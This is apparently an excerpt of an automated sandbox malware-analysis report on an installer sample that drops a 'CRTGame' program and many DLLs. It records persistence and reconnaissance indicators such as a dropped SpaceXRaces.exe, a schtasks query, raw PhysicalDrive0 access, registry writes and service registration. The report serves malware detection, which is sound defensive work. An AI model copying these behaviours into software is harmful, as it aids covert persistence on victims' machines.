                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\libwinpthread-1.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-FLPRF.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-M9NVL.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\bass_tta.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-DSQCO.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\gain_analysis.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-THT99.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-N90RR.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\bassopus.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-US51G.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\sqlite3.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-89IOF.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\opusenc.exe (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\mp3gain.exe (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\pcm2dsd.exe (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\bassmix.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\ff_helper.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\utils.dll (copy)Jump to dropped file
                  Source: C:\Users\user\Desktop\j9htknb7BQ.exeFile created: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\libvorbis.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-9BPGE.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\bassape.dll (copy)Jump to dropped file
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeFile created: C:\ProgramData\SpaceXRaces\SpaceXRaces.exeJump to dropped file

                  Boot Survival

                  barindex
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive05_2_00401A58
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive07_2_02BCF29C
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\system32\schtasks.exe" /Query
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: 5_2_004026F0 GetModuleHandleA,GetModuleFileNameA,GetCommandLineW,CommandLineToArgvW,GetLocalTime,lstrcmpiW,CreateFileA,CloseHandle,ExitProcess,lstrcmpiW,lstrcmpiW,RegCreateKeyExA,GetTickCount,wsprintfA,RegSetValueExA,RegCloseKey,lstrcmpiW,RegCreateKeyExA,GetTickCount,wsprintfA,RegSetValueExA,RegCloseKey,SetEvent,ExitProcess,StartServiceCtrlDispatcherA,5_2_004026F0
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpCode function: 1_2_00423C1C IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,1_2_00423C1C
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpCode function: 1_2_00423C1C IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,1_2_00423C1C
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpCode function: 1_2_004241EC IsIconic,SetActiveWindow,SetFocus,1_2_004241EC
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpCode function: 1_2_004241A4 IsIconic,SetActiveWindow,1_2_004241A4
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpCode function: 1_2_00418394 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,1_2_00418394
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpCode function: 1_2_0042286C SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,1_2_0042286C
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpCode function: 1_2_004175A8 IsIconic,GetCapture,1_2_004175A8
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpCode function: 1_2_00417CDE IsIconic,SetWindowPos,1_2_00417CDE
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpCode function: 1_2_00417CE0 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,1_2_00417CE0
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpCode function: 1_2_00481CB0 IsIconic,GetWindowLongA,ShowWindow,ShowWindow,1_2_00481CB0
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpCode function: 1_2_0044AEAC LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_0044AEAC
                  Source: C:\Users\user\Desktop\j9htknb7BQ.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: LoadLibraryA,GetProcAddress,GetAdaptersInfo,FreeLibrary,5_2_00401B54
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: LoadLibraryA,GetProcAddress,GetAdaptersInfo,FreeLibrary,7_2_02BCF3A0
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeWindow / User API: threadDelayed 9675Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\daiso.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-15Q83.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\basswma.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-U01MD.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-MGR1O.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-LCCKT.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\bassmidi.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\takdec.exe (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\avfilter-9.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\lame_enc.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-2DM26.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\plugins\internal\is-INJF5.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-0B8UA.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\dsd2.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-R3T6A.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\d_writer.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-UK2TT.tmp\_isetup\_isdecmp.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\plugins\internal\is-4DA3B.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-R3MEC.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-6AF6U.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-QRNOQ.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-M6FGJ.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-NTP22.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-4L1QL.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-QASVM.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-KVRT3.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-UK2TT.tmp\_isetup\_RegDLL.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-RV1NR.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-PC991.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-1L7JU.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\avutil-58.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-UK2TT.tmp\_isetup\_setup64.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\sd.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\rg_ebur128.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-LKN3T.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\bassdsd.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-J4G02.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-TN6ID.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-1GFJF.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\bass_ofr.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-7M8GD.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-V1IHP.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\uchardet.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\libmp4v2.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\7z.exe (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-RRVDV.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-53LMN.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\libsox-3.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-Q99K1.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\libsoxr.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\bass_fx.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\bassflac.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\dsd2pcmt.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-V4Q5G.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-PA44V.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-UK2TT.tmp\_isetup\_iscrypt.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-O2JHA.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-L2U9S.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-I69V3.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\libwebp.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\basswv.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\swresample-4.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\dstt.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-KJFHV.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\bass_aac.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-0H0B1.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-UK2TT.tmp\_isetup\_shfoldr.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-768F1.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\uninstall\unins000.exe (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\libFLAC_dynamic.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\basscd.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\bassalac.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\bass.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\plugins\internal\peak_scanner_plugin_c.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-PE6Q4.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\OptimFROG.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\wavpackdll.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-8KTA3.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\uninstall\is-0C5FH.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-VNLOG.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\tak_deco_lib.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\libdtsdec.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-15SLJ.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\plugins\internal\raw_decode_plugin_c.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\da.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-NFQ3O.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\libwinpthread-1.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-OMTUV.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-FLPRF.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-M9NVL.tmpJump to dropped file
